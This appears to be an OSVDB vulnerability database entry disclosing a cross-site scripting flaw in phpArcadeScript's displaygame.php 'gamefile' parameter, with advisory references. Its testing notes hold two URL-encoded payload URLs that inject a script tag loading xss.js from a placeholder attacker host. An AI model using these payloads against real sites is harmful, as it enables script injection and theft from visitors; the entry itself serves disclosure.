phpArcadeScript displaygame.php gamefile Variable XSS

2006-03-04T10:17:38
ID OSVDB:23674
Type osvdb
Reporter OSVDB
Modified 2006-03-04T10:17:38

Description

Manual Testing Notes

http://[target]/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http://[attacker]/xss.js%3E%3C/SCRIPT%3E http://[target]/includes/displaygame.php?filetype=2&gamefile=%22%3E%3CSCRIPT%20SRC=http://[attacker]/xss.js%3E%3C/SCRIPT%3E

References:

Vendor URL: http://www.phparcadescript.com/ Secunia Advisory ID:19124 Related OSVDB ID: 23670 Related OSVDB ID: 23671 Related OSVDB ID: 23672 Related OSVDB ID: 23673 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0630.html